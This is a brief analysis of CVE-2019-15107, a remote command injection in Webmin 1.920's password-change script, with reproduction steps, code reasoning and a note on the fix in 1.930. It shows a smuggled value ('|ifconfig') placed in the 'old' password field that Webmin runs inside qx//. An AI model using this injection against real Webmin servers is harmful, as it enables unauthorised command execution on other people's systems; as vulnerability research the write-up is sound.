CVE-2019-15107:RCE in Webmin <= 1.920 via password-change

# 0x01 Reproduce

• webmin 1.920
• Ubuntu

To reproduce this vulnerability, you need enable the password-change feature.

Then you can check the config and the passwd_mode value has been changed

You can capture post request like this:

Set the parameter old value as |ifconfig

# 0x02 Analysis

The code will check whether the parameter user is a Webmin user. If there is a Webmin user named root and we set user=root,then the $wuser‘s value will be root. If we set user=xxxx，then $wuser will still be undef after grep

However the following is $wuser->{'pass'}，which will change $wuser value from undef to {}

So whatever user you have provided, you will be step in the code segment to update webmin user’s password.

• user=root

• user=noexists_user

Now let’s check the password_change.cgi line 37 ~ line 40：

The implemention of function encrypt_password is of no importance . You should pay attention to how Webmin handles the error message.

Webmin just put our parameter old in qx/.../

And after executing system commands, Webmin will print the result:

So in conclusion there is no need to add a vertical bar (|) , we just set our parameter old value as ifconfig

By the way , there is an interesting issue https://github.com/webmin/webmin/issues/947

# 0x03 Patch

webmin 1.930 fix this security vulnerability by removing the qx() backdoor：